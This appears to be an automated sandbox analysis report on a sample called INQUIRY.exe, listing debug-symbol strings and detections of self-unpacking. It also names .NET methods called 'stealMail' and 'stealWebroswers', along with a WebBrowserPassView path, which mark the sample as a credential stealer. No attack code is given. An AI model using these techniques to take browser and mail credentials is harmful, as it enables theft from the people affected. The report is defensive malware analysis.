                    Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: mscorwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb8hUi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorjit.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: shfolder.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdbe source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb_ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fastprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wintrust.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdbbi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbS source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee-c source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: tsymbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: combase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdbThqia source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: 1_oC:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Detected unpacking (creates a PE file in dynamic memory)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.2300000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.2490000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.2380000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.2300000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.2490000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.2380000.3.unpack
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack
                    .NET source code contains potential unpackerShow sources
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
